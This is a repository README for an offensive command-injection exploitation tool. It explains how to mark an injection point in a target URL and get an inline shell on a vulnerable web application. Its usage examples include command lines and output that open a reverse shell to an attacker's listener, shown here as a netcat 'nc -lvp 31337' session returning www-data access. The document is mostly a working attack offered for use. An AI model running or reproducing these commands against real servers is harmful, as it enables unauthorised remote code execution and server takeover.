Generic Command Exploitation Engine for exploiting web application command-injection bugs,.
Switch branches/tags
Nothing to show
Clone or download
Fetching latest commit…
Cannot retrieve the latest commit at this time.
Type Name Latest commit message Commit time
Failed to load latest commit information.


Web Exploitation Engine - Generic Command Injection Exploitation Utility.

This is a simple enough utility written to exploit command injection bugs
in web applications.

I had abandoned this project a while ago, then saw the brilliant ""
tool written by @LaNMaSteR53, and saw his elegant solution to the "how to
denote where to put the payload" problem, so I shamelessly ripped his code
to write this.

This tool can either give an inline shell like the original (it uses
the same functions, just rewritten to suit), or a reverse shell.
Currently it only supports a Base64 encoded Reverse TCP shell payload,
however the magic of the "payloads" module is that you can actually expand it.
You just have to do a little work to add more payloads.

So, how do I use this.

The only mandatory argument is --url='URL HERE'.
In the url, using the <rce> tag, you specify where to inject code in the request.

For example:
h4x# ./ --url='http://localhost/test/cmd.php?=<rce>'
shell> id 
[*] Executed: id
uid=33(www-data) gid=33(www-data) groups=33(www-data)


By default, it assumes a GET request and uses the inline shell mode.

To specify a POST request, you pass the params and values just like a GET,
except you specify --method=post to tell the parser it is a POST injection.

For example:
h4x# ./ --url='http://localhost/test/cmd-post.php?cmd=<rce>' --method=post
shell> id
[*] Executed: id
uid=33(www-data) gid=33(www-data) groups=33(www-data)


The --shell arguement tells it if you want an inline, or reverse shell. Default
operation is the "inline shell" like the original script.

To do a reverse shell, --shell=reverse is needed. You also must specify the 
host and port to connect to.

--lhost and --lport arguments are, by default, and 4444 respectively.

So, to get a reverse shell sent to port 31337 on "", using the above
GET request exploit, we can do the following.

h4x# ./ --url='http://localhost/test/cmd.php?cmd=<rce>' --shell=reverse --lport=31337
[+] Doing a reverse shell!
[*] LHOST:
[*] LPORT: 31337
[!] Hope your listener is listening

And over at "" (localhost on my box for this demo), we get the following:
# nc -lvp 31337
listening on [any] 31337 ...
connect to [] from localhost [] 58794
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Reverse shell access works rather flawlessly. For now, just the python-reverse payload, however
I hope to add a python bindshell soon, along with, perhaps, some Perl payloads for extra fun.